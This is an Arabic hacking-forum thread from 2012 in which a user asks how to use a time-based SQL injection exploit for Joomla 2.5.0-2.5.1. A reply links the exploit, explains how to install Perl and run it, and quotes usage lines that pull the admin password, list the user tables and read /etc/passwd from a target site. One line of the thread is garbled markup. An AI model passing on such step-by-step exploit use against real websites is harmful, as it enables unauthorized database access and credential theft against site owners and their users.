شرح ثغره

03-19-2012, 08:08 PM

السلام عليكم

مطلوب شرح الثغره الجديده
Joomla 2.5.0-2.5.1 Time Based SQL Injection Exploit

المصدر: :: vBspiders Professional Network ::

Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC avp eyvi

معاني الفراق · 03-20-2012, 12:56 AM

التغره بلغه البيرل
استخدم مترجم بيرل

Dr.NaNo · 03-20-2012, 06:13 AM

وعليكم السلام ورحمه الله وبركاته.

هذه هي الثغرة لم تقم بوضع رابطها :

http://www.exploit-db.com/exploits/18618/

اقتباس


	#!/usr/bin/perl

كما تلاحظ الثغرة مكتوبة بلغة البيرل تحتاج لمترجم البيرل بجهازك لكي تستطيع إستثمار الثغرة.

لتحميل مترجم البيرل من موقعه الرسمي :

http://www.activestate.com/activeperl/downloads

بعد ذلك تذهب إلى شاشة الدوس وتذهب لمسار الملف وتنفذ الأمر ك

perl 18618.pl

سوف يأتيك الشرح لكيفية التشغيل :

examples:
get admin password:
18618.pl http://host/joomla/ 3 'database()'
18618.pl http://host/joomla/ 3 'select table_name from information_schema.tables where table_schema="joomla" and table_name like "%25_users"'
18618.pl http://host/joomla/ 3 'select password from zzzz_users limit 1'
get file /etc/passwd
18618.pl http://host/joomla/ 3 'load_file("/etc/passwd")'

الثغرة ليست بتلك الخطورة ,

شرح ثغره

جـــ'ابات العناكــ'ب